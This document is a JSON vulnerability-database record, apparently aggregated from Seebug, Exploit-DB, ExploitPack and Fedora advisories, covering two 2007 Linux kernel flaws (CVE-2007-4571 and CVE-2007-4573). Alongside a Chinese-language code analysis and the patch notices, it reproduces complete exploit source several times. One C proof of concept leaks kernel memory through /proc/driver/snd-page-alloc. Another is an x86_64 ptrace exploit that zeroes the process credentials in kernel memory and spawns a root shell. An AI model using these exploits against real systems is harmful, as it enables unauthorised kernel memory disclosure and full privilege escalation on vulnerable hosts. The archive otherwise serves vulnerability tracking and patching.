fd=open(\"/proc/driver/snd-page-alloc\",O_RDONLY);\r\n for (j=0;j<(unsigned int)_SOME_NUM;j++) {\r\n memset(kern_mem,0,2);\r\n /* That 1 really do the job ;P */\r\n if (!read(fd,kern_mem,1)) {\r\n close(fd);\r\n fd=open(\"/proc/driver/snd-page-alloc\",O_RDONLY);\r\n } else printf(\"%c\",kern_mem[0]);\r\n }\r\n}\r\n \n ", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-83980"}, {"lastseen": "2017-11-19T21:57:38", "description": "BUGTRAQ ID: 25807\r\nCVE(CAN) ID: CVE-2007-4571\r\n\r\nLinux Kernel\u662f\u5f00\u653e\u6e90\u7801\u64cd\u4f5c\u7cfb\u7edfLinux\u6240\u4f7f\u7528\u7684\u5185\u6838\u3002\r\n\r\nLinux\u7cfb\u7edf\u7684ALSA\u58f0\u5361\u9a71\u52a8\u5b9e\u73b0\u4e0a\u5b58\u5728\u6f0f\u6d1e\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u83b7\u53d6\u5185\u6838\u5185\u5b58\u4e2d\u7684\u654f\u611f\u4fe1\u606f\u3002\r\n\r\nLinux Kernel\u5728\u5904\u7406\u591a\u4e2a/proc/driver/snd-page-alloc\u6587\u4ef6\u7684\u8bfb\u64cd\u4f5c\u65f6\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0csound/core/memalloc.c\u6587\u4ef6\u4e2d\u5982\u4e0b\u5b9a\u4e49\u4e86\u8bfb\u64cd\u4f5c\u7684\u7cfb\u7edf\u8c03\u7528snd_mem_proc_read\uff1a\r\n\r\n 484 static int snd_mem_proc_read(char *page, char **start, off_t off,\r\n 485 int count, int *eof, void *data)\r\n 486 {\r\n 487 int len = 0;\r\n ...\r\n 494 len += snprintf(page + len, count - len,\r\n 495 "pages : %li bytes (%li pages per %likB)\\n",\r\n 496 pages * PAGE_SIZE, pages, PAGE_SIZE / 1024);\r\n ...\r\n 508 return len;\r\n 509 }\r\n\r\n\u5728494\u884c\u8c03\u7528\u4e86snprintf\u4ee5\u751f\u6210proc\u6587\u4ef6\u7cfb\u7edf\u9879\u7684\u8f93\u51fa\uff0c\u5982\u679c\u63d0\u4f9b\u4e86\u8ba1\u6570\u503c1\uff0csnprintf\u5c31\u4f1a\u4ec5\u5411\u76ee\u6807\u7f13\u51b2\u533a\u5199\u5165\u5355\u4e2a\u5b57\u8282\uff0c\u4f46\u5982\u679c\u6709\u8db3\u591f\u7a7a\u95f4\u7684\u8bdd\uff0c\u51fd\u6570\u5c31\u4f1a\u8fd4\u56de\u5e94\u5199\u5165\u7684\u5b57\u8282\u6570\u3002\u6ca1\u6709\u8bbe\u7f6e\u8fc7*eof\u503c\uff0c\u4e5f\u6ca1\u6709\u4f7f\u7528\u8fc7*ppos\u503c\u3002 \r\n\r\nfs/proc/generic.c\u6587\u4ef6\u4e2d\u5b9a\u4e49\u4e86\u4eceproc_file_read\u8c03\u7528\u7684\u8fd9\u4e2a\u51fd\u6570\uff1a\r\n\r\n 51 static ssize_t\r\n 52 proc_file_read(struct file *file, char __user *buf, size_t nbytes,\r\n 53 loff_t *ppos)\r\n 54 {\r\n ...\r\n 136 n = dp->read_proc(page, &start, *ppos,\r\n 137 count, &eof, dp->data);\r\n ...\r\n 155 n -= *ppos;\r\n 156 if (n <= 0)\r\n 157 break;\r\n 158 if (n > count)\r\n 159 n = count;\r\n 160 start = page + *ppos;\r\n ...\r\n 186 n -= copy_to_user(buf, start < page ? page : start, n);\r\n ...\r\n 193 *ppos += start < page ? (unsigned long)start : n;\r\n\r\n\u5728136\u884c\u4ece\u5bf9snd_proc_mem_read\u51fd\u6570\u7684\u8c03\u7528\u8fd4\u56de\u4e86\u503cn\u3002\u7531\u4e8e\u8fd4\u56de\u503c\uff08\u5728\u5355\u4e2a\u8bbe\u5907\u7684\u60c5\u51b5\u4e0b\u5927\u7ea6\u4e3a41\uff09\u5927\u4e8e\u6240\u8bf7\u6c42\u7684\u8bfb\u5927\u5c0f\uff081\uff09\uff0c\u5728158\u884cn\u503c\u88ab\u8bbe\u7f6e\u4e3acount\uff0c\u4e4b\u540e*ppos\u9012\u589e\uff0c\u4ecestart\uff08\u8ba1\u7b97\u4e3apage + *ppos\uff09\u5c06n\u5b57\u8282\u62f7\u8d1d\u5230\u4e86\u7528\u6237\u57df\u3002 \r\n\r\n\u5728\u4e4b\u540e\u7684\u7528\u6237\u57df\u8bfb\u64cd\u4f5c\u4e2d\uff0c\u5982\u679c*ppos\u5927\u4e8e0\u7684\u8bdd\uff0cproc_file_read\u51fd\u6570\u5c31\u4f1a\u62f7\u8d1d\u8fc7snd_mem_proc_read\u5199\u5165\u7684\u9875\u9762\uff0c\u5bfc\u81f4\u6cc4\u9732\u5185\u6838\u5185\u5b58\u3002\r\n\n\nLinux kernel < 2.6.22.8\n \u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u5378\u8f7dsnd_page_alloc\u6a21\u5757\r\n* \u4fee\u6539/etc/fstab\u4e2d\u7684\u52a0\u8f7d\u53c2\u6570\u9650\u5236\u5bf9/proc\u6587\u4ef6\u7cfb\u7edf\u7684\u8bbf\u95ee\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLinux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=\"http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.22.8.tar.bz2\" target=\"_blank\">http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.22.8.tar.bz2</a>", "published": "2007-09-27T00:00:00", "title": "Linux Kernel ALSA\u9a71\u52a8snd-page-alloc\u672c\u5730Proc\u6587\u4ef6\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4571"], "modified": "2007-09-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-2251", "id": "SSV:2251", "sourceData": "", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure", "edition": 1, "published": "2007-09-21T00:00:00", "title": "Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4571"], "modified": "2007-09-21T00:00:00", "id": "EXPLOITPACK:41E42B7C4DE7094C90B621FA0E017848", "href": "", "sourceData": "/*\nsource: https://www.securityfocus.com/bid/25774/info\n \n/*\nThe Linux kernel is prone to a local privilege-escalation vulnerability.\n \nExploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers.\n \nVersions of Linux kernel prior to 2.4.35.3 and 2.6.22.7 are vulnerable to this issue. \n*/\n\n\n/*\n *****************************************************************************************\n * by Karimo_DM under GPL *\n * *\n * Linux Kernel ALSA snd-page-alloc Local Proc File Information Disclosure Vulnerability *\n * CVE-2007-4571 *\n * *\n * This simple PoF demonstrate how snd_page_alloc.c prior to Linux Kernel version * \n * 2.6.22.8 (2.6.23-rc8) fails to boundary check a buffer in case of count=1 showing *\n * parts of kernel memory (reaveling randomly some risky informations). \t *\n * *\n * karimo@localhost:~/src/c/bugs$ gcc -O2 cve20074571_alsa.c -ocve20074571_alsa *\n * karimo@localhost:~/src/c/bugs$ ./cve20074571_alsa | hexdump -C *\n * 00000000 00 03 55 55 27 00 00 00 10 50 12 08 1e 50 12 08 |..UU'....P...P..| *\n * 00000010 4f 53 46 30 30 30 31 30 30 32 30 2f 2f 00 41 4e |OSF00010020//.AN| *\n * 00000020 53 49 5f 58 33 2e 34 2d 31 39 00 03 55 55 27 00 |SI_X3.4-19..UU'.| *\n * 00000030 00 00 10 50 12 08 1e 50 12 08 4f 53 46 30 30 30 |...P...P..OSF000| *\n * 00000040 31 30 30 32 30 2f 2f 00 41 4e 53 49 5f 58 33 2e |10020//.ANSI_X3.| *\n * 00000050 34 2d 31 39 00 03 55 55 27 00 00 00 10 50 12 08 |4-19..UU'....P..| *\n * 00000060 1e 50 12 08 4f 53 46 30 30 30 31 30 30 32 30 2f |.P..OSF00010020/| *\n * 00000070 2f 00 41 4e 53 49 5f 58 33 2e 34 2d 31 39 00 03 |/.ANSI_X3.4-19..| *\n * 00000080 55 55 27 00 00 00 10 50 12 08 1e 50 12 08 4f 53 |UU'....P...P..OS| *\n * 00000090 46 30 30 30 31 30 30 32 30 2f 2f 00 41 4e 53 49 |F00010020//.ANSI| *\n * ... *\n * 000051d0 00 02 20 00 78 ce ed da c0 43 93 c4 01 80 00 4d |.. .x\u00ce\u00ed\u00da\u00c0C.\u00c4...M| *\n * 000051e0 71 88 9d 3c 04 27 0d 5d 80 ec 19 2f 12 8a 42 9d |q..<.'.].\u00ec./..B.| *\n * 000051f0 80 2e 9f c7 89 2c 87 ca 97 dd 50 8a e3 fa c3 15 |...\u00c7.,.\u00ca.\u00ddP.\u00e3\u00fa\u00c3.| *\n * 00005200 a2 3e 37 49 93 c4 01 80 00 4d 71 88 9d 3c 04 27 |\u00a2>7I.\u00c4...Mq..<.'| *\n * 00005210 0d 5d 80 ec 19 2f 12 8a 42 9d 80 2e 9f c7 89 2c |.].\u00ec./..B....\u00c7.,| *\n * 00005220 87 ca 97 dd 50 8a e3 fa c3 15 a2 3e 37 49 93 c4 |.\u00ca.\u00ddP.\u00e3\u00fa\u00c3.\u00a2>7I.\u00c4| *\n * ... *\n * *\n * *\n * [ Tested on a Slackware 12.0 running a self-compiled 2.6.21.3 Linux Kernel ] *\n *****************************************************************************************\n */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <fcntl.h>\n\n#define _SOME_NUM 0xffff\n\nint main() {\n unsigned int j;\n char kern_mem[2];\n int fd=open(\"/proc/driver/snd-page-alloc\",O_RDONLY);\n for (j=0;j<(unsigned int)_SOME_NUM;j++) {\n memset(kern_mem,0,2);\n /* That 1 really do the job ;P */\n if (!read(fd,kern_mem,1)) {\n close(fd);\n fd=open(\"/proc/driver/snd-page-alloc\",O_RDONLY);\n } else printf(\"%c\",kern_mem[0]);\n }\n}", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4571"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2007-10-08T13:50:41", "published": "2007-10-08T13:50:41", "id": "FEDORA:L98DOFCE010426", "href": "", "type": "fedora", "title": "[SECURITY] Fedora Core 6 Update: kernel-2.6.22.9-61.fc6", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4571"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2007-09-28T21:24:04", "published": "2007-09-28T21:24:04", "id": "FEDORA:L8SLO9TI029024", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: kernel-2.6.22.9-91.fc7", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4573"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2007-09-25T15:44:20", "published": "2007-09-25T15:44:20", "id": "FEDORA:L8PFIPEW010706", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: kernel-2.6.22.7-85.fc7", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3848"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2007-08-24T05:44:00", "published": "2007-08-24T05:44:00", "id": "FEDORA:L7O5I5DM030334", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: kernel-2.6.22.4-65.fc7", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3848"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2007-09-04T21:38:29", "published": "2007-09-04T21:38:29", "id": "FEDORA:L84LCTQV029218", "href": "", "type": "fedora", "title": "[SECURITY] Fedora Core 6 Update: kernel-2.6.22.4-45.fc6", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T12:42:29", "description": "Linux Kernel 2.6.x ALSA snd-page-alloc Local Proc File Information Disclosure Vulnerability. CVE-2007-4571. Local exploit for linux platform", "published": "2007-09-21T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4571"], "modified": "2007-09-21T00:00:00", "id": "EDB-ID:30605", "href": "https://www.exploit-db.com/exploits/30605/", "sourceData": "source: http://www.securityfocus.com/bid/25774/info\r\n \r\nThe Linux kernel is prone to a local privilege-escalation vulnerability.\r\n \r\nExploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers.\r\n \r\nVersions of Linux kernel prior to 2.4.35.3 and 2.6.22.7 are vulnerable to this issue. \r\n\r\n/*\r\n *****************************************************************************************\r\n * by Karimo_DM under GPL *\r\n * *\r\n * Linux Kernel ALSA snd-page-alloc Local Proc File Information Disclosure Vulnerability *\r\n * CVE-2007-4571 *\r\n * *\r\n * This simple PoF demonstrate how snd_page_alloc.c prior to Linux Kernel version * \r\n * 2.6.22.8 (2.6.23-rc8) fails to boundary check a buffer in case of count=1 showing *\r\n * parts of kernel memory (reaveling randomly some risky informations). \t *\r\n * *\r\n * karimo@localhost:~/src/c/bugs$ gcc -O2 cve20074571_alsa.c -ocve20074571_alsa *\r\n * karimo@localhost:~/src/c/bugs$ ./cve20074571_alsa | hexdump -C *\r\n * 00000000 00 03 55 55 27 00 00 00 10 50 12 08 1e 50 12 08 |..UU'....P...P..| *\r\n * 00000010 4f 53 46 30 30 30 31 30 30 32 30 2f 2f 00 41 4e |OSF00010020//.AN| *\r\n * 00000020 53 49 5f 58 33 2e 34 2d 31 39 00 03 55 55 27 00 |SI_X3.4-19..UU'.| *\r\n * 00000030 00 00 10 50 12 08 1e 50 12 08 4f 53 46 30 30 30 |...P...P..OSF000| *\r\n * 00000040 31 30 30 32 30 2f 2f 00 41 4e 53 49 5f 58 33 2e |10020//.ANSI_X3.| *\r\n * 00000050 34 2d 31 39 00 03 55 55 27 00 00 00 10 50 12 08 |4-19..UU'....P..| *\r\n * 00000060 1e 50 12 08 4f 53 46 30 30 30 31 30 30 32 30 2f |.P..OSF00010020/| *\r\n * 00000070 2f 00 41 4e 53 49 5f 58 33 2e 34 2d 31 39 00 03 |/.ANSI_X3.4-19..| *\r\n * 00000080 55 55 27 00 00 00 10 50 12 08 1e 50 12 08 4f 53 |UU'....P...P..OS| *\r\n * 00000090 46 30 30 30 31 30 30 32 30 2f 2f 00 41 4e 53 49 |F00010020//.ANSI| *\r\n * ... *\r\n * 000051d0 00 02 20 00 78 ce ed da c0 43 93 c4 01 80 00 4d |.. .x\u00ce\u00ed\u00da\u00c0C.\u00c4...M| *\r\n * 000051e0 71 88 9d 3c 04 27 0d 5d 80 ec 19 2f 12 8a 42 9d |q..<.'.].\u00ec./..B.| *\r\n * 000051f0 80 2e 9f c7 89 2c 87 ca 97 dd 50 8a e3 fa c3 15 |...\u00c7.,.\u00ca.\u00ddP.\u00e3\u00fa\u00c3.| *\r\n * 00005200 a2 3e 37 49 93 c4 01 80 00 4d 71 88 9d 3c 04 27 |\u00a2>7I.\u00c4...Mq..<.'| *\r\n * 00005210 0d 5d 80 ec 19 2f 12 8a 42 9d 80 2e 9f c7 89 2c |.].\u00ec./..B....\u00c7.,| *\r\n * 00005220 87 ca 97 dd 50 8a e3 fa c3 15 a2 3e 37 49 93 c4 |.\u00ca.\u00ddP.\u00e3\u00fa\u00c3.\u00a2>7I.\u00c4| *\r\n * ... *\r\n * *\r\n * *\r\n * [ Tested on a Slackware 12.0 running a self-compiled 2.6.21.3 Linux Kernel ] *\r\n *****************************************************************************************\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n\r\n#define _SOME_NUM 0xffff\r\n\r\nint main() {\r\n unsigned int j;\r\n char kern_mem[2];\r\n int fd=open(\"/proc/driver/snd-page-alloc\",O_RDONLY);\r\n for (j=0;j<(unsigned int)_SOME_NUM;j++) {\r\n memset(kern_mem,0,2);\r\n /* That 1 really do the job ;P */\r\n if (!read(fd,kern_mem,1)) {\r\n close(fd);\r\n fd=open(\"/proc/driver/snd-page-alloc\",O_RDONLY);\r\n } else printf(\"%c\",kern_mem[0]);\r\n }\r\n}\r\n ", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/30605/"}, {"lastseen": "2016-02-03T12:42:22", "description": "Linux Kernel 2.6.x Ptrace Local Privilege Escalation Vulnerability. CVE-2007-4573. Local exploit for linux platform", "published": "2007-09-21T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.x - Ptrace Local Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4573"], "modified": "2007-09-21T00:00:00", "id": "EDB-ID:30604", "href": "https://www.exploit-db.com/exploits/30604/", "sourceData": "source: http://www.securityfocus.com/bid/25774/info\r\n\r\nThe Linux kernel is prone to a local privilege-escalation vulnerability.\r\n\r\nExploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers.\r\n\r\nVersions of Linux kernel prior to 2.4.35.3 and 2.6.22.7 are vulnerable to this issue. \r\n\r\n/*\r\n * exploit for x86_64 linux kernel ia32syscall emulation\r\n * bug, discovered by Wojciech Purczynski <cliph_at_isec.pl>\r\n *\r\n * by\r\n * Robert Swiecki <robert_at_swiecki.net>\r\n * Przemyslaw Frasunek <venglin_at_freebsd.lublin.pl>\r\n * Pawel Pisarczyk <pawel_at_immos.com.pl>\r\n * of ATM-Lab http://www.atm-lab.pl\r\n */\r\n\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/ptrace.h>\r\n#include <inttypes.h>\r\n#include <sys/reg.h>\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/mman.h>\r\n\r\nuint32_t uid, euid, suid;\r\n\r\nstatic void kernelmodecode(void)\r\n{\r\n int i;\r\n uint8_t *gs;\r\n uint32_t *ptr;\r\n\r\n asm volatile (\"movq %%gs:(0x0), %0\" : \"=r\"(gs));\r\n\r\n for (i = 200; i < 1000; i+=1) {\r\n\r\n ptr = (uint32_t*) (gs + i);\r\n\r\n if ((ptr[0] == uid) && (ptr[1] == euid)\r\n && (ptr[2] == suid) && (ptr[3] == uid)) {\r\n ptr[0] = 0; //UID\r\n ptr[1] = 0; //EUID\r\n ptr[2] = 0; //SUID\r\n\r\n break;\r\n }\r\n }\r\n\r\n}\r\n\r\nstatic void docall(uint64_t *ptr, uint64_t size)\r\n{\r\n getresuid(&uid, &euid, &suid);\r\n\r\n uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);\r\n\r\n if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,\r\n MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {\r\n printf(\"mmap fault\\n\");\r\n exit(1);\r\n }\r\n\r\n for (; ptr < (tmp + size); ptr++)\r\n *ptr = (uint64_t)kernelmodecode;\r\n\r\n __asm__(\"\\n\"\r\n \"\\tmovq $0x101, %rax\\n\"\r\n \"\\tint $0x80\\n\");\r\n\r\n printf(\"UID %d, EUID:%d GID:%d, EGID:%d\\n\", getuid(), geteuid(), getgid(), getegid());\r\n execl(\"/bin/sh\", \"bin/sh\", 0);\r\n printf(\"no /bin/sh ??\\n\");\r\n exit(0);\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n int pid, status, set = 0;\r\n uint64_t rax;\r\n uint64_t kern_s = 0xffffffff80000000;\r\n uint64_t kern_e = 0xffffffff84000000;\r\n uint64_t off = 0x0000000800000101 * 8;\r\n\r\n if (argc == 4) {\r\n docall((uint64_t*)(kern_s + off), kern_e - kern_s);\r\n exit(0);\r\n }\r\n\r\n if ((pid = fork()) == 0) {\r\n ptrace(PTRACE_TRACEME, 0, 0, 0);\r\n execl(argv[0], argv[0], \"2\", \"3\", \"4\", 0);\r\n perror(\"exec fault\");\r\n exit(1);\r\n }\r\n\r\n if (pid == -1) {\r\n printf(\"fork fault\\n\");\r\n exit(1);\r\n }\r\n\r\n for (;;) {\r\n if (wait(&status) != pid)\r\n continue;\r\n\r\n if (WIFEXITED(status)) {\r\n printf(\"Process finished\\n\");\r\n break;\r\n }\r\n\r\n if (!WIFSTOPPED(status))\r\n continue;\r\n\r\n if (WSTOPSIG(status) != SIGTRAP) {\r\n printf(\"Process received signal: %d\\n\", WSTOPSIG(status));\r\n break;\r\n }\r\n\r\n rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);\r\n if (rax == 0x000000000101) {\r\n if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {\r\n printf(\"PTRACE_POKEUSER fault\\n\");\r\n exit(1);\r\n }\r\n set = 1;\r\n }\r\n\r\n if ((rax == 11) && set) {\r\n ptrace(PTRACE_DETACH, pid, 0, 0);\r\n for(;;)\r\n sleep(10000);\r\n }\r\n\r\n if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {\r\n printf(\"PTRACE_SYSCALL fault\\n\");\r\n exit(1);\r\n }\r\n }\r\n\r\n return 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/30604/"}]}
